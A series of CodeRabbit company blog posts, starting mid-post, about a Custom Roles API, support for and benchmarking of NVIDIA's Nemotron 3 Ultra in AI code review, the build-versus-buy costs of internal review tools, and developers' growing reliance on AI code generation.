  "duplicate_from": "cr_member",
  "permissions": [
    { "resource_id": "user_management", "access_type": "read" }
  ]
}
```

The new API endpoints include:

* GET /v1/roles
* GET /v1/roles/permissions
* POST /v1/roles
* GET /v1/roles/{role\_id}
* PATCH /v1/roles/{role\_id}
* DELETE /v1/roles/{role\_id}

## Try it out

The Custom Roles API turns access management from a click-by-click chore into something your systems handle on their own: provisioned consistently, updated instantly, and easy to govern as your team grows. It's available now for Enterprise customers. Generate an API key with Admin permissions from your CodeRabbit dashboard, and wire role management into the workflows you already run.

**Learn more:** [Create a custom role API reference](https://docs.coderabbit.ai/api-reference/roles-create)
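As a rough illustration of managing roles from a script, the sketch below builds the same role-creation request in Python using only the standard library. The URL, header name, and body fields come from the example above. The `CODERABBIT_API_KEY` environment variable, the `Content-Type` header, and the function name are assumptions made for this sketch, so check the API reference before relying on them.

```python
import json
import os
import urllib.request

API_URL = "https://api.coderabbit.ai/v1/roles"


def build_create_role_request(
    api_key: str, name: str, duplicate_from: str, permissions: list[dict]
) -> urllib.request.Request:
    """Build (but do not send) a POST request that creates a custom role."""
    payload = {"name": name, "duplicate_from": duplicate_from, "permissions": permissions}
    return urllib.request.Request(
        API_URL,
        data=json.dumps(payload).encode("utf-8"),
        headers={
            "x-coderabbitai-api-key": api_key,
            "Content-Type": "application/json",  # assumed; not shown in the example above
        },
        method="POST",
    )


request = build_create_role_request(
    api_key=os.environ.get("CODERABBIT_API_KEY", "placeholder-key"),  # hypothetical variable name
    name="Security Reviewer",
    duplicate_from="cr_member",
    permissions=[{"resource_id": "user_management", "access_type": "read"}],
)
print(request.get_method(), request.full_url)
# To actually send it: urllib.request.urlopen(request)
```

Keeping request construction separate from sending makes the role definition easy to review in version control and to test without touching the live API.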

CodeRabbit now supports NVIDIA Nemotron 3 Ultra

Sahil Mohan Bansal — Thu, 04 Jun 2026 00:00:00 GMT

*TL;DR: NVIDIA Nemotron 3 Ultra delivers accuracy and fast throughput in CodeRabbit's self-hosted AI code reviews*. We are excited to share that CodeRabbit is expanding its support for the NVIDIA Nemotron family of open models to include Nemotron 3 Super and [**Nemotron 3 Ultra**](https://blogs.nvidia.com/blog/nvidia-gtc-taipei-computex-2026-news/#nemotron-3-ultra) for AI code review workflows. Nemotron 3 Super helps with context gathering and summarization, whereas Nemotron 3 Ultra helps generate code review comments for many reviews outside of the most complex tiers. This expanded support is available for CodeRabbit's self-hosted customers running its container image on their own infrastructure. Initial eval results indicate that **Nemotron 3 Ultra** aligns with our current frontier model ensemble for junior-tier engineering assessments, with similar token efficiency while achieving approximately 2x faster response times. OpenAI and Anthropic models remain the primary engines for producing most of the review comments delivered to your Pull Requests. ### Expanding to Super and Ultra: Faster context gathering and lower latency We previously announced our [support of Nemotron 3 Nano and Super](https://www.coderabbit.ai/blog/faster-code-reviews-with-nemotron-3-super), where we reported that a blend of open and frontier models allows us to improve the overall speed of context gathering and PR summarization. This blend of open and frontier models is also more cost efficient because it routes different parts of the review workflow to the appropriate model family: PR summarization with Nemotron and review comments with frontier LLMs. As with the rest of the Nemotron family, NVIDIA is releasing Ultra as a truly open model, with the weights, training data, and training recipe published alongside it. That openness is part of why Nemotron has been a good fit for self-hosted teams that need to run reviews inside their own environment. 
With support for Nemotron 3 Nano, Super, and now Ultra, we can use Nemotron open models for context gathering, PR summarization, and some aspects of review comment generation. ![A detailed technical architecture diagram showcasing CodeRabbit's AI agents, context enrichment, and knowledge base components.](https://victorious-bubble-f69a016683.media.strapiapp.com/Code_Rabbit_Architecture_with_Nemotron_1_5146e1bc54.png) ### What Ultra unlocks beyond Nano and Super When you open a Pull Request (PR), CodeRabbit’s code review workflow is triggered, starting with an isolated and secure sandbox environment where CodeRabbit analyzes code from a clone of the repo. In parallel, CodeRabbit pulls in context signals from several sources: - Code and PR index - Linter / Static App Security Tests (SAST) - Multi-repo code graph - Coding agent rules files - Custom review rules and Learnings - Issue details (Plan file, Jira, Linear, GitHub issues) - Public MCP servers - Web search A lot of this context, along with the code diff being analyzed, is used to generate a PR Summary before any review comments are generated. Summarization is at the heart of every code review and is the key to delivering high signal-to-noise in the review comments. We continue to support Nemotron 3 Nano and Super for the repetitive work of context processing during review summarization, which is critical for our code reviews. 
![Code editor displaying JavaScript functions and variables, with a related forum discussion below it.](https://victorious-bubble-f69a016683.media.strapiapp.com/image_2bc619b54c.png) We compared Nemotron 3 Ultra against equivalent frontier models and our analysis found that at the junior reviewer tier Nemotron 3 Ultra: * Matched our frontier model blend on review quality measured by pass rate and precision * Produced a comparable volume of review comments at a comparable number of tokens per review * Ran with almost 50% less median latency making it 2x faster than using only frontier LLMs These results held for both trivial and junior-level review comments. These are early, encouraging results in a specific place: faster, lower-effort reviews where an efficient open model can carry more of the load. For customers this means faster PR summarization, context gathering and faster code reviews without compromising quality. We are also delighted to support the announcement from NVIDIA today about the expansion of its Nemotron family of open models and are excited to work with the company to help accelerate AI coding adoption across every industry. [Get in touch](https://www.coderabbit.ai/contact-us/sales) with the CodeRabbit team to access CodeRabbit’s container image if you would like to run AI code reviews on your self-hosted infrastructure.

Nemotron 3 Ultra makes the case for fast, open coding models

Juan Pablo Flores — Thu, 04 Jun 2026 00:00:00 GMT

NVIDIA Nemotron 3 Ultra does not feel like another model built primarily for a chat window. The first question is not whether it can win a leaderboard, but whether it can fit into the way developers actually use models now: inside terminals, review pipelines, coding agents, test generators, and workflows where the model has to keep moving through messy context. [NVIDIA](https://www.nvidia.com/en-us/) is releasing a large open model with roughly 550 billion total parameters and about 55 billion active per token, but the real pitch is speed plus control. If a model is fast enough, a developer can stay in the loop. A system can retry it. A coding harness can keep it working until the task is actually finished. Ultra is not the model I would frame as "the new best coding assistant." It points toward a world where open models become fast, controllable workers inside developer systems, not just chat interfaces waiting for the next prompt. For workflows where the model is one part of a larger loop, Nemotron 3 Ultra becomes especially relevant: code review, test generation, repository research, agentic coding, and internal automation where teams care about speed, control, and where the model runs. ![Scatter plot showing AI intelligence index versus output speed, with a most attractive quadrant highlighted.](https://victorious-bubble-f69a016683.media.strapiapp.com/image_1_89beaab96b.png) ## What we know about Nemotron 3 Ultra Nemotron 3 Ultra is the largest model in [NVIDIA's Nemotron 3 family](https://www.coderabbit.ai/blog/coderabbit-ai-code-reviews-now-support-nvidia-nemotron). The family includes Nano, Super, and Ultra, all designed around agentic AI applications. Ultra is the big reasoning engine in that lineup: roughly 550 billion total parameters, with about 55 billion active per token through a sparse mixture-of-experts design. 
The cleanest comparison is with [Nemotron 3 Super](https://www.coderabbit.ai/blog/faster-code-reviews-with-nemotron-3-super), the previous large model in the family.

| Characteristic | Nemotron 3 Super | Nemotron 3 Ultra |
| :---- | :---- | :---- |
| Role in the family | High-throughput reasoning model for agentic workflows | Largest Nemotron 3 reasoning model for more complex coding, research, and enterprise workflows |
| Total parameters | 120B | 550B |
| Active parameters | 12B active per token | 55B active per token |
| Architecture | Hybrid Mamba-Transformer MoE | Hybrid Mamba-Transformer MoE |
| Expert design | Latent MoE | Latent MoE |
| Context length | Up to 1M tokens | Up to 1M tokens |
| Efficiency features | Multi-token prediction and NVFP4 training/deployment path | Multi-token prediction and NVFP4-oriented deployment path |
| Best fit | High-volume agentic workflows, coding, planning, and tool use | More demanding developer workflows where speed, scale, and stronger reasoning need to sit in the same loop |

In simpler terms: this is not just a bigger dense Transformer. Ultra is built to activate only part of the network per token, keep long context practical, and produce tokens quickly enough that developers can use it interactively instead of treating it like a slow background batch job.

![Flowchart detailing Nemotron 3 Ultra's fast architecture: long context, Mamba-Transformer, MoE routing, multi-token prediction.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_33ddb6cb02.png)

The launch numbers put Ultra in a strong spot. [Artificial Analysis](https://artificialanalysis.ai/) reported Nemotron 3 Ultra at 48 on its Intelligence Index, making it the leading US open-weight model in that snapshot, ahead of Gemma 4 31B, Nemotron 3 Super, and gpt-oss-120b. Kimi K2.6 still sits higher at 54, so the claim is not that Ultra owns the entire open frontier. The claim is that it is unusually fast for the intelligence level it reaches. 
Artificial Analysis also reported more than 300 output tokens per second on a pre-release DeepInfra endpoint. For developers, that speed is the useful part. In coding, latency changes behavior. If a model is slow, you fire and forget. If it is fast, you stay in the loop, ask follow-ups, run multiple attempts, and let an agentic harness keep pushing. ![NVIDIA Nemotron 3 Ultra announcement slide showing a cost comparison graph presented by a speaker.](https://victorious-bubble-f69a016683.media.strapiapp.com/image3_b00e5036f7.png) ## What is different this time Nemotron 3 Super already showed that NVIDIA could build a capable open model for agentic workflows. Ultra pushes further in two ways. First, it is much bigger. Super is around 120B total parameters with roughly 12B active. Ultra moves to roughly 550B total and 55B active. That extra scale shows up in the way NVIDIA and early testers talk about it: not as a small efficient helper model, but as a model that can start taking work from proprietary frontier systems in selected workflows. Second, Ultra appears to have been trained and evaluated with developer harnesses more directly in mind. NVIDIA mentions that Super turned out to be good in agentic harnesses, while Ultra was built with those harnesses in mind. For coding tools, that changes the requirements. A model that works well in OpenCode, OpenHands, Kilo Code, Continue, or an [internal code review](https://www.coderabbit.ai/blog/your-internal-ai-code-review-tool-cost-more-than-you-think) loop has to do more than answer questions. It has to follow tool protocols, manage long context, make progress under repeated prompts, and recover when it gets stuck. Ultra's behavior fits that target. The model is quick, direct, not especially verbose, and unlikely to ask for lots of clarification. That can be a strength in a harness, but a weakness if the task depends on unstated requirements. It benefits from explicit instruction. 
The best mental model is closer to Codex-style prompting than Claude-style prompting. Spell out the task. Give acceptance criteria. State the expected output format. ## CodeRabbit Benchmark Performance CodeRabbit's internal benchmark gives a more grounded view than launch charts alone. The benchmark compares a baseline set of review models against a Nemotron 3 Ultra configuration across 105 evaluation problems, ranging from easier issues to harder review tasks. The evaluation uses post-pipeline final comments after verification, deduplication, and assertive filtering. The judge was gpt-5.1 with medium reasoning, low verbosity, single mode, and three votes. ![CodeRabbit benchmark table compares Baseline average and Nematron 3 Ultra performance metrics.](https://victorious-bubble-f69a016683.media.strapiapp.com/image4_ebd75f9572.png) The top-line result is close: * Baseline average, N=3: 60/105 pass actual, or 57 percent * Nemotron 3 Ultra average, N=2: 58/105 pass actual, or 56 percent * Baseline pass full: 66/105, or 63 percent * Nemotron 3 Ultra pass full: 65/105, or 62 percent * Baseline precision actual: 34.0 percent * Nemotron 3 Ultra precision actual: 33.0 percent The positive read: on this review workload, Ultra was roughly in the same band as the baseline on pass metrics. It found real issues, survived the review pipeline, and produced useful CodeRabbit-style comments. The caveat is reliability. The model had a high retry rate. The benchmark summary shows an average of 36.5 retries for the Ultra runs, compared with 0.3 for the baseline. The retry distribution notes that about 66 percent were scratchpad-only. In practice, the model sometimes voluntarily stops before producing the required output marker or final structured output. Retrying without changing the prompt often works, which suggests the capability is there, but the first-attempt completion behavior is not stable enough to ignore. 
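The premature-stop behavior described above is the kind of failure a small validation-and-retry wrapper can absorb. Here is a minimal Python sketch, assuming a hypothetical `FINAL_OUTPUT:` marker followed by a JSON object. The marker, the function names, and the stub model are illustrative only and are not CodeRabbit's actual pipeline.

```python
import json
from typing import Callable, Optional

FINAL_MARKER = "FINAL_OUTPUT:"  # hypothetical marker the prompt asks the model to emit


def extract_structured(response: str) -> Optional[dict]:
    """Return the JSON object after the marker, or None if it is missing or invalid."""
    _, found, tail = response.partition(FINAL_MARKER)
    if not found:
        return None  # scratchpad-only response: the model stopped early
    try:
        parsed = json.loads(tail.strip())
    except json.JSONDecodeError:
        return None
    return parsed if isinstance(parsed, dict) else None


def call_with_retries(
    generate: Callable[[str], str], prompt: str, max_attempts: int = 3
) -> tuple[dict, int]:
    """Re-send the same prompt until the response validates; return (result, attempts used)."""
    for attempt in range(1, max_attempts + 1):
        result = extract_structured(generate(prompt))
        if result is not None:
            return result, attempt
    raise RuntimeError(f"no valid structured output after {max_attempts} attempts")


def make_stub_model(responses: list[str]) -> Callable[[str], str]:
    """Stand-in for a real model call that replays canned responses in order."""
    remaining = iter(responses)
    return lambda prompt: next(remaining)


stub = make_stub_model(
    ["scratchpad: still thinking", 'notes... FINAL_OUTPUT: {"comments": []}']
)
result, attempts = call_with_retries(stub, "Review this diff")
print(result, attempts)
```

The wrapper retries with an unchanged prompt, matching the observation that a plain retry often succeeds. Returning the attempt count alongside the result makes it easy to track retry rates over time.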
The practical finding from the CodeRabbit data is clear: Nemotron 3 Ultra can do the work, but it should be wrapped in validation and retry logic for structured-output tasks. There is also an interesting latency signal. In the benchmark, the Ultra run shows a mean latency of 7:06 per full review trace, compared with 8:31 for the baseline. That is not an enormous difference in this specific report, but the Ultra runs were carrying a large retry burden and still remained competitive on time. NVIDIA's framing around Ultra repeatedly returns to the same idea: if the model is fast enough, several attempts can still beat one slower, more careful attempt. The cost story is less clean in the benchmark. The reported total cost for the Ultra run is higher than the baseline in this specific table. That should not be over-generalized, because internal fallback rates, hosted endpoint pricing, and retry behavior can dominate a local experiment. The public NVIDIA and Artificial Analysis story is about cost-to-completion and throughput. The [CodeRabbit](https://coderabbit.ai/) results say something narrower: on this benchmark, quality was close, speed was competitive, and the reliability control loop needs work. ## Where Ultra looks strong for developers The strongest use case for Nemotron 3 Ultra is not "replace every coding model." It is "run a lot of useful developer work quickly, with explicit instructions and external checks." 
It looks promising for: * Code review pipelines where comments can be verified, filtered, deduplicated, and retried * Integration test generation, especially when the model needs to read broad context * Repository research tasks that require scanning many files or documents * Agentic workflows where a harness can keep the model moving until the task is complete * Everyday coding tasks that benefit from fast iteration more than perfect one-shot reasoning NVIDIA also shared a useful example: Ultra was used in OpenCode to read several papers and reason across them. That is not a PhD-level coding challenge, but it is exactly the kind of everyday developer task where speed changes the workflow. You can stay in the terminal, watch the model move, and keep steering. For CodeRabbit-style work, the model also seems especially interesting on easier and medium-difficulty review tasks. These are still valuable reviews: the system needs to catch practical issues, explain them clearly, and produce a lot of review output without waiting on a more expensive frontier model every time. ## What developers should watch out for Ultra needs structure. If you are using it for coding or developer automation, do not treat it as a free-form chat model and hope it infers the workflow. Give it a harness. Give it a checklist. Give it stop conditions. Give it output validation. Practical guidance: * Use explicit prompts with concrete acceptance criteria. * For structured output, validate the required markers or schema before accepting the response. * Add retry logic for premature stops. * Use goal loops or external completion checks so the model keeps working until the task is actually done. * Ask for tests explicitly. In early hands-on use, the model did not always generate its own tests. * Be specific about design requirements. It can produce better visual artifacts than expected, but design is not its core strength. 
* Prefer it for high-throughput workflows where several attempts are acceptable. * Be cautious for workflows where a single malformed output can break production automation. This model also changes how teams should think about benchmarking. A pure one-shot benchmark may underrate Ultra if the real product loop allows retries. A benchmark that ignores retries may overrate it if the product needs strict first-attempt formatting. The right metric is probably closer to time-to-usable-completion, with quality, retries, latency, and cost all measured together. ## Verdict Nemotron 3 Ultra is one of the most interesting open model releases for developers because it is not only chasing intelligence. It is chasing usable throughput. The model is big, open, and fast. Public benchmarks put it near the top of US open-weight intelligence while keeping it far ahead of many peers on output speed. CodeRabbit's benchmark adds a more sober picture: Ultra can perform close to a strong review baseline, but it currently needs retries and external validation for structured-output reliability. The verdict is nuanced. If you want a model that will nail every strict format on the first try, Ultra is not yet the safest default. If you are building an agentic developer system where the harness can validate, retry, and keep pressure on the model until the work is complete, Ultra becomes much more compelling. For coding teams, the bigger story is not whether Nemotron 3 Ultra replaces a favorite chat model. It is whether open, high-throughput coding agents are starting to feel practical. Try it on [CodeRabbit PR reviews](https://app.coderabbit.ai/login???free-trial) now and let us know your thoughts.

Why your internal AI code review tool will cost more than you think

David Loker — Wed, 03 Jun 2026 00:00:00 GMT

When engineering teams start evaluating AI code review, the build option gets serious consideration fast, and having spent years building ML infrastructure at Netflix and Amazon, co-founding a generative AI company, and now serving as VP of AI at CodeRabbit, I understand why. The models are accessible, the APIs are straightforward, and with agentic coding tools like Claude and Codex now doing a meaningful share of the implementation work, a strong engineering team can get a working prototype out the door faster than ever before. The barrier to building has genuinely come down, and that's worth acknowledging honestly before making the case against it.

But a working prototype isn't really what's being evaluated. What engineering teams are actually deciding is whether they can own this internal tool for two years. And that's where the math changes. What shows up in that first sprint is maybe ten percent of what it actually takes to run AI code review well over a longer period of time. From my own experience, and from speaking with customers who tried to build their own code review tool internally, the gap between a working demo and a solution your security team, your compliance team, and engineers across dozens of repositories can actually rely on is where the real cost lives.

This piece works through what that investment looks like in practice, with a breakdown of the maintenance requirements that tend to get underestimated at the outset and cost comparisons across three company sizes, so that the decision is grounded in something more honest than a back-of-napkin estimate of what it takes to ship a prototype.

## The math that gets underestimated

[Attio](https://attio.com/engineering/blog/building-better-software-with-ai) documented what it actually took to build and run their own AI code review tooling. Their experience is useful because they were honest about it: the early prototype was tractable, but the operational surface area kept growing.
That pattern is consistent across the organizations we have spoken with. When you model the real cost of building internally, not just the initial build sprint but the maintenance team, model evaluation cycles, infrastructure, security reviews, and internal support, the numbers look very different from the back-of-envelope calculation that usually kicks off the project. Our cost benchmarks are derived from [Attio's publicly documented implementation](https://attio.com/engineering/blog/building-better-software-with-ai), scaled for org size based on what we consistently see in practice. For a mid-enterprise org of 700 to 1,500 engineers, a realistic build team is 4 to 8 engineers spanning backend, infrastructure, and ML/prompt engineering roles, typically with one PM, over a 3 to 6 month build window. For large enterprise organizations at 2,500 to 4,000 engineers, that scales to 6 to 12 engineers. All FTE costs assume $180k to $250k fully loaded (base salary, benefits, equity, and overhead), which is consistent with [industry benchmarks for senior engineering roles](https://www.mrjrecruitment.com/resources/blog/the-definitive-ai-engineering-salary-benchmarks--2026-us-market-report/) in this space. At those numbers, the annualized cost of a maintained internal tool for a mid-enterprise org runs somewhere between $650,000 and $2 million. That range accounts for the ongoing maintenance team, initial build costs amortized over three years, model and API costs that tend to run $100,000 to $500,000 at that scale, and the infrastructure and operational overhead that accumulates as the tool becomes load-bearing across the organization. For enterprise organizations at 2,500 to 4,000 engineers, the spread is wider. Building internally at that scale requires what amounts to a full product team: six to twelve engineers, a PM, compliance and security layers, and model costs that can exceed $2 million annually. 
Total cost: $2.35 million to $7.5 million per year, before accounting for the opportunity cost of the engineering teams building and maintaining it over time.

## What the internal tools actually run into

The cost model alone does not tell the whole story. The harder problem is that internal AI code review tools tend to follow the same failure patterns regardless of how good the initial implementation is.

1. **The first is cost overrun:** The initial build often lands on budget. What teams underestimate is that maintenance costs grow as the tool sees broader adoption, model costs accumulate, and reliability expectations rise across the org. By year two, the internal tool frequently costs more to run than a purpose-built external solution would have from day one.
2. **The second is low adoption:** From our conversations with engineering teams, there are two main reasons for low adoption of internally built AI code review tools. The first is that they produce low-quality reviews that lack context on the codebase and dependencies. The second is a lack of integration into existing workflows, such as the developer's choice of agent. When integration is shallow, human reviewers continue carrying the load as the tool runs in the background without changing much.
3. **The third is outright sunset:** PR volume accelerates, often driven by AI coding agents, faster than internal tooling can keep up with. Signal-to-noise deteriorates. Developers stop trusting the output. The project gets shut down and teams return to fully manual review at a volume that senior engineers cannot absorb.

These are not edge cases. They are the three most common outcomes we see from organizations that have gone through this cycle.

## So, should you build or should you buy?

[Writer](https://www.coderabbit.ai/case-studies/buy-vs-build-why-writer-bought-their-ai-code-review-tool), an AI-native company, had the technical capability to build an AI code review tool.
Their engineering team evaluated the option and concluded the resource cost was not justified. The time it would take to build something production-grade would pull engineers away from the core product. The ongoing maintenance would do the same thing indefinitely. They chose CodeRabbit, and it now runs across more than 37 repositories, with review cycles 30% faster. The engineering team that would have been building and maintaining an internal tool is building Writer instead.

A large global internet company built their own code review tool in-house. For a while it worked. Then they needed to scale from a few hundred developers to close to 3,000. Their homegrown tool couldn’t get there. Beyond the scaling problem, keeping the tool running was costing them close to $1M a year in maintenance alone, with engineering hours and resources going toward an internal tool instead of the product. They chose CodeRabbit and left behind their homegrown tool, along with the maintenance burden that came with it.

That is the actual question for most engineering leaders: what is this team's core competency? If it is the product you are selling, an internal AI code review platform is probably not the best use of the engineers you have. The maintenance burden, covering scale, upgrades, security, on-call, noise tuning, and knowledge continuity as teams change, is real and it grows.

## The case for buying

If you are seriously evaluating whether to build internally, run the numbers on your specific org size before scoping the project. Token costs, engineering headcount, PR volume, and infrastructure requirements all affect the calculation differently depending on where you are. The gap between build and buy tends to be larger than teams expect at the start of the evaluation, and it widens as the org grows. That’s because production-grade AI code review is more than a single LLM prompt reviewing a diff.
CodeRabbit has spent the last three years refining our context engine across millions of pull requests and more than 15,000 engineering teams. That accumulated domain expertise, knowing which context matters for which kind of change, is the difference between a system that summarizes diffs and one that finds the issues that could derail what you intended to ship. CodeRabbit combines sandboxed repository analysis, specialized AI agents, autonomous code exploration, and persistent memory, and it integrates with 40+ linters and security scanners to understand your codebase at a much deeper level.

We built a calculator that lets you model your specific context, covering team size, PR volume, and fully-loaded engineer cost. It is available in our full [Build vs. Buy guide](https://www.coderabbit.ai/whitepapers/build-vs-buy-ai-code-review-guide) with detailed cost breakdowns for mid-enterprise and enterprise scenarios.
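To make the cost structure described in this post concrete, here is a rough sketch of the annualized arithmetic: amortized build cost, plus the maintenance team, plus model and API spend, plus infrastructure. It is not the calculator from the guide. The team size, build window, FTE cost, and model spend use the mid-enterprise ranges quoted above, but the maintenance headcount is an assumption, and infrastructure is left at zero, so the output will not match the published ranges.

```python
from dataclasses import dataclass


@dataclass
class BuildScenario:
    build_engineers: int          # engineers on the initial build
    build_months: float           # length of the build window
    maintenance_engineers: float  # ongoing FTEs after launch (assumed input)
    fte_cost: float               # fully loaded annual cost per engineer, USD
    model_api_cost: float         # annual model and API spend, USD
    infra_cost: float = 0.0       # annual infrastructure and ops overhead, USD
    amortization_years: int = 3   # build cost is spread over this many years


def annualized_cost(s: BuildScenario) -> float:
    """Annual cost = amortized build + maintenance team + model/API + infrastructure."""
    build_cost = s.build_engineers * s.fte_cost * (s.build_months / 12)
    amortized_build = build_cost / s.amortization_years
    maintenance = s.maintenance_engineers * s.fte_cost
    return amortized_build + maintenance + s.model_api_cost + s.infra_cost


# Low and high ends for a mid-enterprise org. Maintenance headcount (2 and 4)
# is a hypothetical value chosen for illustration, not a figure from the post.
low = BuildScenario(4, 3, maintenance_engineers=2, fte_cost=180_000, model_api_cost=100_000)
high = BuildScenario(8, 6, maintenance_engineers=4, fte_cost=250_000, model_api_cost=500_000)

if __name__ == "__main__":
    print(f"${annualized_cost(low):,.0f} to ${annualized_cost(high):,.0f} per year")
```

Even in this simplified form, the maintenance term dominates the amortized build cost, which is the point the post makes about the first sprint being a small share of the total.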

You’re addicted to AI code generation. Now what?

David Loker — Tue, 02 Jun 2026 00:00:00 GMT

Software engineers are rapidly building a psychological reward loop around tools they only partially trust. It is, indeed, a strange paradox of sorts. Developers distrust these assistants just enough to double-check their work, yet they rely on them enough to keep them permanently open in their IDEs. The immediate challenge for engineering organizations isn't deciding whether to use AI, but rather designing production systems that can handle this unprecedented influx of code without burying teams under a mountain of verification debt. ![Habit loop diagram showing Trigger, Routine, Reward, and central Reward Loop.](https://victorious-bubble-f69a016683.media.strapiapp.com/Internal_reward_loop_image_cc0008c6e6.png) If you want to see how deeply ingrained this has become, try turning off your coding assistant for a single afternoon. Without AI, development reverts to its traditional, deliberate pace. You start by digging through documentation, manually tracing unfamiliar modules, and facing a blank file trying to figure out where to begin. You might copy a design pattern from a neighboring microservice, slowly writing the first iteration line by line while trying to hold the broader architecture, edge cases, and business logic entirely in your head. With an AI assistant, your entire entry point shifts. Instead of staring at a blank screen, you ask the model to explain the module, outline the likely call path, and offer perhaps three different implementation approaches. You have it scaffold the basic service, draft the database migration, and sketch out the initial test cases. While you still have to evaluate and correct the output, you are starting the day reacting to an existing draft rather than building from scratch. This shift in momentum is exactly what makes working without an assistant feel so jarring. The core responsibilities of the job haven't changed, but the tempo clearly has. 
Without the AI-coding tool, you lose the instant second opinion, the built-in explainer, and the immediate gratification of seeing a prompt materialize into a functional boilerplate. The work is entirely doable, but it feels significantly heavier once your daily workflow has adapted to that accelerated feedback loop. This structural shift in the software development lifecycle is an addiction or even stronger than an addiction. The genie is out of the bottle, and there’s no going back. Let’s face it, software engineers have developed a functional dependency on a tool that provides immediate feedback. You prompt, edit, accept, and run the code in a continuous cycle. Sometimes the solution is incredibly elegant. Sometimes it is entirely wrong but highly confident. Often, it is just close enough to keep you moving forward. Ultimately, AI tools have fundamentally changed the day-to-day experience of programming. ## From tech novelty to muscle memory AI code generation has quickly transitioned from a tech novelty to muscle memory. According to [Stack Overflow’s 2025 Developer Survey,](https://survey.stackoverflow.co/2025/) 84% of respondents were using or planning to adopt AI tools, with over half of professional developers utilizing them daily. [JetBrains reported](https://blog.jetbrains.com/research/2025/10/state-of-developer-ecosystem-2025) similar findings, noting that 85% of developers regularly use AI tools in their development process, and 62% rely on a dedicated AI coding assistant or editor. At major tech companies, the adoption curve is steep. In early 2026, Google CEO Sundar Pichai [noted](https://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/cloud-next-2026-sundar-pichai) that 75% of all new code at the company was AI-generated and subsequently reviewed and approved by engineers. That’s a significant jump from 50% just six months prior. 
He highlighted a complex code migration that was completed six times faster through human-agent collaboration than would have been possible using traditional methods. The key phrase here is *AI-generated and approved by engineers*. The shift is here to stay, and the real opportunity lies in building robust review systems that help teams translate this engineering speed into secure, stable production code.

Historically, writing code was expensive and time-consuming. Engineering organizations built their cultures around that scarcity through structured sprint planning, estimates, peer reviews, and strict release trains. Today, drafting code is cheap. But trusting it remains exceptionally resource-intensive. This is the new economic reality of the software engineering addiction. Code generation is abundant, but verification is scarce.

## Addiction rhymes with contradiction

The most glaring contradiction in modern software development is that engineers are using AI more while trusting it less. The Stack Overflow survey also found that 46% of developers actively distrust the accuracy of AI tools compared to only 33% who trust them. Unsurprisingly, senior engineers were the most skeptical demographic.

This behavior sounds contradictory on paper, but it makes complete sense as a practical workflow decision. AI assistants reduce the cognitive friction of getting started. They turn a daunting, empty file into an editable draft, convert an unfamiliar codebase into a conversational Q&A session, and quickly build out repetitive test suites. Traditional, manual-first software development is plagued by tiny, annoying frictions like hunting down a forgotten method signature, navigating poorly documented internal conventions, or writing rare migration syntax. AI smooths over these roadblocks just enough to keep the developer moving forward.
Behavioral research shows that variable rewards and rapid uncertainty resolution can make digital experiences highly compelling. AI coding assistants mirror this pattern perfectly. One prompt generates standard boilerplate, the next hallucinates an internal library, the third hits the exact solution, and the fourth delivers a broken implementation wrapped in flawless formatting. AI acts less like outsourcing and more like a tool that sustains your personal creative momentum.

## Productivity metrics meet reality

The productivity gains are real, but they come with strings attached. [DORA’s 2025 research](https://dora.dev/research/2025/dora-report) indicated that 90% of tech professionals use AI at work, with over 80% reporting a noticeable boost in productivity. AI excels at explaining complex logic, translating languages, generating initial test coverage, and minimizing the drag of routine tasks. It helps junior developers self-start and frees up senior engineers from tedious boilerplate.

However, productivity metrics in software engineering have always been difficult to isolate. A single developer can feel incredibly fast while the broader organization slows down. A team might close more tickets and push more code, only to dramatically increase their code review burden and quietly introduce architectural flaws, security vulnerabilities, and operational surprises down the line.

A 2025 [randomized controlled trial by METR](https://metr.org/blog/2025-07-10-early-2025-ai-experienced-os-dev-study/) illustrated this tension clearly. In a study involving experienced open-source developers working inside familiar repositories, engineers actually took 19% *longer* to complete tasks when allowed to use AI tools. While METR’s [2026 update](https://metr.org/blog/2026-02-24-uplift-update/) noted that newer models have likely improved this speed metric, it also emphasized that measuring true productivity has become much more complex as adoption spreads.
DORA’s 2026 [updated analysis](https://dora.dev/insights/balancing-ai-tensions), meanwhile, offers an accurate framework for this shift. AI accelerates the initial creation of code, but the time saved during the drafting phase is simply reallocated to auditing, testing, and verification downstream. Consequently, higher AI adoption has been statistically linked to both an increase in delivery throughput and an increase in software deployment instability. Think of AI as a multiplier for whatever environment it drops into. If a team already has robust automated guardrails through strict linting, heavy test coverage, and comprehensive integration environments, they can safely handle this influx of code. But if an organization is already struggling with flaky tests, fuzzy code ownership, and slow review cycles, these tools just help them pile up technical debt at a terrifying new speed. The old workflow used to be about writing, reviewing, and merging. The new reality is about generating, verifying, and taking actual accountability for the output. ## From raw code production to system stewardship AI-generated code looks highly professional on the surface. It uses standard naming conventions, includes helpful comments, and mimics existing codebase patterns. This polished appearance can easily distort the psychology of a code review. While messy code practically begs to be challenged, clean-looking code encourages quick approval. The most dangerous architectural failures such as missed multi-tenant separation, weak permission boundaries, or subtle race conditions hide easily behind this visual confidence. Data from CodeRabbit’s [2025 analysis of open-source pull requests](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report) suggested that AI-assisted changes averaged roughly 10.83 issues per PR, compared to 6.45 for entirely human-authored code. 
Third-party analysis by *The Register* [noted](https://www.theregister.com/software/2025/12/17/ai-authored-code-needs-more-attention-contains-worse-bugs/) that this shouldn't be a reason to abandon AI tools altogether, but rather an indicator of a shifting review burden. AI introduces errors at a different scale and volume than traditional coding. Because of this, the role of the developer is shifting away from raw code production toward system stewardship. When drafting code becomes trivial, human value centers on intent, architecture, risk management, and ultimate ownership. Rather than focus on syntax, senior engineers must learn to dictate explicit constraints when it comes to security assumptions, performance expectations, data boundaries, and more. A thorough, AI-assisted engineer has to ask targeted system questions: * What architectural invariants must this code preserve? * Where could this change introduce regressions across different user roles or regions? * What specific test would fail if the model misunderstood our internal business logic? * Does this proposal duplicate an existing internal abstraction? ## Channeling the prompter’s high To adapt to this environment, engineering teams need to modernize their code review rituals rather than restrict tool usage. The goal is to make AI integration visible, teachable, and strictly aligned with production standards. This requires three core principles: * **Generate openly:** Teams should feel free to use AI as a collaborator for drafting, debugging, and documentation. The organization should focus on whether the final change is fully understood by the author, not whether an AI touched the keyboard. * **Verify aggressively:** Automated testing, security scanning, and observability must keep pace with generation speed. The faster a draft appears, the faster the feedback loop needs to react. * **Own completely:** Blaming an AI for a production outage carries the same weight as blaming a compiler. 
